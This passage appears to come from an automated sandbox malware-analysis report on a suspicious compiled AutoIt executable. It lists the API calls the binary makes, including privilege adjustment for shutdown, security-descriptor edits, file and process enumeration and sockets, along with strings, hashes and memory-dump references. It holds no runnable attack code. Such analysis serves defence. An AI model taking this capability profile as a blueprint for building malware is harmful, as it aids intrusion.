                          • Part of subcall function 004101F0: GetSysColorBrush.USER32 ref: 004101F9
                          • Part of subcall function 004101F0: LoadCursorW.USER32 ref: 00410209
                          • Part of subcall function 004101F0: LoadIconW.USER32 ref: 0041021F
                          • Part of subcall function 004101F0: LoadIconW.USER32 ref: 00410232
                          • Part of subcall function 004101F0: LoadIconW.USER32 ref: 00410245
                          • Part of subcall function 004101F0: LoadImageW.USER32 ref: 0041026A
                          • Part of subcall function 004101F0: RegisterClassExW.USER32 ref: 004102C6
                          • Part of subcall function 004103E0: CreateWindowExW.USER32 ref: 00410415
                          • Part of subcall function 004103E0: CreateWindowExW.USER32 ref: 0041043E
                          • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 00410454
                          • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 0041045E
                          • Part of subcall function 0040E1E0: _memset.LIBCMT ref: 0040E202
                          • Part of subcall function 0040E1E0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memset_wcscpy
                        • String ID: @GH$@GH$C:\Users\user\AppData\Local\Temp\zwuonypqu.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                        • API String ID: 2493088469-1229943998
                        • Opcode ID: 69cfb0be49d24e5250ef6e64c59b5ea2b0a961f7c54b5140d3e7fdea8d41d4c7
                        • Instruction ID: f6e0ab4c143dd9a1f797559286fb6c41f0380d60009eb7dc722615656bf0e84e
                        • Opcode Fuzzy Hash: 69cfb0be49d24e5250ef6e64c59b5ea2b0a961f7c54b5140d3e7fdea8d41d4c7
                        • Instruction Fuzzy Hash: 0341F731618341ABD320F7A19C49BAF3BA4AB96704F04493FF941672D1DBBC9949C72E
                        APIs
                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403871
                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403887
                        • __wsplitpath.LIBCMT ref: 004038B2
                          • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                        • _wcscpy.LIBCMT ref: 004038C7
                        • _wcscat.LIBCMT ref: 004038DC
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 004038EC
                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                          • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                          • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                          • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                          • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,0040397D,?,?,00000010), ref: 00403F54
                          • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,00000010), ref: 00403F8B
                        • _wcscpy.LIBCMT ref: 004039C2
                        • _wcslen.LIBCMT ref: 00403A53
                        • _wcslen.LIBCMT ref: 00403AAA
                        Strings
                        • #include depth exceeded. Make sure there are no recursive includes, xrefs: 0042B87B
                        • Error opening the file, xrefs: 0042B8AC
                        • Unterminated string, xrefs: 0042B9BA
                        • _, xrefs: 00403B48
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpy$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_wcscatstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                        • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                        • API String ID: 4115725249-188983378
                        • Opcode ID: 3adab5d83006d487c5f09c82b08e7d614f1b1b99f9bc08b9f0817a95f0cb116d
                        • Instruction ID: dca64db042171ec5605b2d10b6a92a42a2076cc25022adee7b8115af8a15fc96
                        • Opcode Fuzzy Hash: 3adab5d83006d487c5f09c82b08e7d614f1b1b99f9bc08b9f0817a95f0cb116d
                        • Instruction Fuzzy Hash: 16D1D5B15083019AD710EF65C841AEB77E8AF95308F04492FF5C563292DB78DA49C7AB
                        APIs
                        • FindFirstFileW.KERNEL32(?,?), ref: 00434C12
                        • GetFileAttributesW.KERNEL32(?), ref: 00434C4F
                        • SetFileAttributesW.KERNEL32(?,?), ref: 00434C65
                        • FindNextFileW.KERNEL32(00000000,?), ref: 00434C77
                        • FindClose.KERNEL32(00000000), ref: 00434C88
                        • FindClose.KERNEL32(00000000), ref: 00434C9C
                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00434CB7
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00434CFE
                        • SetCurrentDirectoryW.KERNEL32(0048A090), ref: 00434D22
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00434D2A
                        • FindClose.KERNEL32(00000000), ref: 00434D35
                        • FindClose.KERNEL32(00000000), ref: 00434D43
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                        • String ID: *.*
                        • API String ID: 1409584000-438819550
                        • Opcode ID: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                        • Instruction ID: 399dbb17912f16e5170155dcc5475d9346bc7ba5aa4a4c8a0ea4d4714b2c7a66
                        • Opcode Fuzzy Hash: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                        • Instruction Fuzzy Hash: 4141D8726042086BD710EF64DC45AEFB3A8AAC9311F14592FFD54C3280EB79E915C7B9
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Timetime$Sleep
                        • String ID: BUTTON
                        • API String ID: 4176159691-3405671355
                        • Opcode ID: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                        • Instruction ID: 32c89cc89acb3c111fc3cc5f781edb0c57d51ec263d79eeef99f8852f1a29925
                        • Opcode Fuzzy Hash: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                        • Instruction Fuzzy Hash: CB21B7723843016BE330DB74FD4DF5A7B94A7A5B51F244876F600E6290D7A5D442876C
                        APIs
                        • FindFirstFileW.KERNEL32(?,75701228,75701228,?,?,00000000), ref: 00442E40
                        • FindNextFileW.KERNEL32(00000000,?,?,00000000), ref: 00442EA4
                        • FindClose.KERNEL32(00000000,?,00000000), ref: 00442EB5
                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00442ED1
                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00442EF0
                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00442F3B
                        • SetCurrentDirectoryW.KERNEL32(0048A090,?,?,?,00000000), ref: 00442F6D
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00442F75
                        • FindClose.KERNEL32(00000000), ref: 00442F80
                          • Part of subcall function 00436D2D: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00436D4F
                        • FindClose.KERNEL32(00000000,?,?,?,00000000), ref: 00442F92
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                        • String ID: *.*
                        • API String ID: 2640511053-438819550
                        • Opcode ID: 9379a40a392f11a7e453a238fddec55769e51d026bd73d4c4d0da232c8837110
                        • Instruction ID: 5fd3b3f399b1dfd6b0a62b5043663bf11a2259675d3c80dc16c90576bc2ddb84
                        • Opcode Fuzzy Hash: 9379a40a392f11a7e453a238fddec55769e51d026bd73d4c4d0da232c8837110
                        • Instruction Fuzzy Hash: 0F41E8326083046BD620FA64DD85BEFB3A89BC5311F54492FF95483280E7FEA50D8779
                        APIs
                          • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004392DE
                          • Part of subcall function 004392BC: GetLastError.KERNEL32 ref: 004392E4
                          • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043930B
                          • Part of subcall function 0043928B: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004392A5
                        • GetSecurityDescriptorDacl.ADVAPI32(?,00000004,?,?,?,?), ref: 00445E4B
                        • _memset.LIBCMT ref: 00445E61
                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00445E83
                        • GetLengthSid.ADVAPI32(?), ref: 00445E92
                        • GetAce.ADVAPI32(?,00000000,?,?,00000018), ref: 00445EDE
                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00445EFB
                        • GetLengthSid.ADVAPI32(?,?,00000018), ref: 00445F11
                        • GetLengthSid.ADVAPI32(?,00000008,?,?,00000000,?,00000000), ref: 00445F39
                        • CopySid.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00445F40
                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?,?,00000000,?,00000000), ref: 00445F6E
                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?,00000000), ref: 00445F8B
                        • SetUserObjectSecurity.USER32(?,?,?), ref: 00445FA0
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
                        • String ID:
                        • API String ID: 3490752873-0
                        • Opcode ID: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                        • Instruction ID: 491154c1e478dcf6c9ac3cbca3c2c9e2645d4ee7bbdc2abf5fae4ada557f6fe4
                        • Opcode Fuzzy Hash: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                        • Instruction Fuzzy Hash: 85519D71108301ABD610DF61CD84E6FB7E9AFC9B04F04491EFA869B242D778E909C76B
                        APIs
                        • OleInitialize.OLE32(00000000), ref: 0047AA03
                        • CLSIDFromProgID.OLE32(00000000,?), ref: 0047AA27
                        • CoCreateInstance.OLE32(?,00000000,00000005,004829C0,?), ref: 0047AAAA
                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0047AB6B
                        • _memset.LIBCMT ref: 0047AB7C
                        • _wcslen.LIBCMT ref: 0047AC68
                        • _memset.LIBCMT ref: 0047ACCD
                        • CoCreateInstanceEx.OLE32 ref: 0047AD06
                        • CoSetProxyBlanket.OLE32(004829D0,?,?,?,?,?,?,00000800), ref: 0047AD53
                        Strings
                        • NULL Pointer assignment, xrefs: 0047AD84
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CreateInitializeInstance_memset$BlanketFromProgProxySecurity_wcslen
                        • String ID: NULL Pointer assignment
                        • API String ID: 1588287285-2785691316
                        • Opcode ID: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                        • Instruction ID: 16786b45dbc5194aa398acfc0f0ff3b91b98a178c64a073a91da7f4e0cb75f58
                        • Opcode Fuzzy Hash: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                        • Instruction Fuzzy Hash: 54B10DB15083409FD320EF65C881B9FB7E8BBC8744F108E2EF58997291D7759948CB66
                        APIs
                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 004364B9
                        • OpenProcessToken.ADVAPI32(00000000), ref: 004364C0
                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004364D6
                        • AdjustTokenPrivileges.ADVAPI32 ref: 004364FE
                        • GetLastError.KERNEL32 ref: 00436504
                        • ExitWindowsEx.USER32(?,00000000), ref: 00436527
                        • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00436557
                        • SetSystemPowerState.KERNEL32 ref: 0043656A
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                        • String ID: SeShutdownPrivilege
                        • API String ID: 2938487562-3733053543
                        • Opcode ID: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                        • Instruction ID: b625d7910520021a286729d09db348b3c4b0b131b75d5259d4bd29649b467962
                        • Opcode Fuzzy Hash: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                        • Instruction Fuzzy Hash: E021D5B02803017FF7149B64DD4AF6B3398EB48B10F948829FE09852D2D6BDE844973D
                        APIs
                        • __swprintf.LIBCMT ref: 00436162
                        • __swprintf.LIBCMT ref: 00436176
                          • Part of subcall function 0041353A: __woutput_l.LIBCMT ref: 0041358F
                        • __wcsicoll.LIBCMT ref: 00436185
                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 004361A6
                        • LoadResource.KERNEL32(?,00000000), ref: 004361AE
                        • LockResource.KERNEL32(00000000), ref: 004361B5
                        • FindResourceW.KERNEL32(?,?,00000003), ref: 004361DA
                        • LoadResource.KERNEL32(?,00000000), ref: 004361E4
                        • SizeofResource.KERNEL32(?,00000000), ref: 004361F0
                        • LockResource.KERNEL32(?), ref: 004361FD
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll__woutput_l
                        • String ID:
                        • API String ID: 2406429042-0
                        • Opcode ID: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                        • Instruction ID: 79d88324f8a28cdfdddc37bd7103cac5134eefaeeaedb246b69d205017f9fa0d
                        • Opcode Fuzzy Hash: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                        • Instruction Fuzzy Hash: 82313432104210BFD700EF64ED88EAF77A9FB89304F00882BFA4196150E778D940CB68
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 0045D522
                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D593
                        • GetLastError.KERNEL32 ref: 0045D59D
                        • SetErrorMode.KERNEL32(?), ref: 0045D629
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Error$Mode$DiskFreeLastSpace
                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                        • API String ID: 4194297153-14809454
                        • Opcode ID: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                        • Instruction ID: 49a1caac5541b587bc648ef7caa6256b54369420b38b3993b587487a6931f65b
                        • Opcode Fuzzy Hash: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                        • Instruction Fuzzy Hash: BA31AD75A083009FC310EF55D98090BB7E1AF89315F448D6FF94997362D778E9068B6A
                        APIs
                        • MkParseDisplayName.OLE32(?,00000000,?,?), ref: 0047AF0F
                          • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                          • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                          • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                          • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                        • OleInitialize.OLE32(00000000), ref: 0047AE06
                          • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                          • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                        • _wcslen.LIBCMT ref: 0047AE18
                        • CreateBindCtx.OLE32(00000000,?), ref: 0047AEC2
                        • CLSIDFromProgID.OLE32(00000000,?), ref: 0047AFCC
                        • GetActiveObject.OLEAUT32(?,00000000,?), ref: 0047AFF9
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CopyVariant$_wcslen$ActiveBindCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcscpy
                        • String ID: HH
                        • API String ID: 1915432386-2761332787
                        • Opcode ID: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                        • Instruction ID: 7e3b4e38c6064d991530b19baaff212313fd3e9d55f264e0ba959e8ba912c45c
                        • Opcode Fuzzy Hash: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                        • Instruction Fuzzy Hash: 6C915C71604301ABD710EB65CC85F9BB3E8AFC8714F10892EF64597291EB78E909CB5A
                        APIs
                        • socket.WSOCK32(00000002,00000001,00000006,?,00000000), ref: 004648B0
                        • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,?,00000000), ref: 004648BE
                        • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648DA
                        • WSAGetLastError.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648E6
                        • closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000005,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 0046492D
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: ErrorLast$bindclosesocketsocket
                        • String ID:
                        • API String ID: 2609815416-0
                        • Opcode ID: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
                        • Instruction ID: d240999dee57073d64b91b26c15bb406cb7727aead8f71c00845428af50f987f
                        • Opcode Fuzzy Hash: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
                        • Instruction Fuzzy Hash: C731CB712002009BD710FF2ADC81B6BB3E8EF85724F144A5FF594A72D2D779AC85876A
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00437043
                        • Process32FirstW.KERNEL32(00000000,00000002), ref: 00437050
                        • Process32NextW.KERNEL32(00000000,?), ref: 00437075
                        • __wsplitpath.LIBCMT ref: 004370A5
                          • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                        • _wcscat.LIBCMT ref: 004370BA
                        • __wcsicoll.LIBCMT ref: 004370C8
                        • CloseHandle.KERNEL32(00000000), ref: 00437105
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                        • String ID:
                        • API String ID: 2547909840-0
                        • Opcode ID: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                        • Instruction ID: d866d71778569fbbd99b025f777f77cc3db9ba9c83dfb601fa45888e96c7797d
                        • Opcode Fuzzy Hash: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                        • Instruction Fuzzy Hash: 9C21A7B20083819BD735DB55C881BEFB7E8BB99304F00491EF5C947241EB79A589CB6A
                        APIs
                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                        • FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0045217E
                        • Sleep.KERNEL32(0000000A,?,?,00000000), ref: 004521B2
                        • FindNextFileW.KERNEL32(?,?,?,00000000), ref: 004522AC
                        • FindClose.KERNEL32(?,?,00000000), ref: 004522C3
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
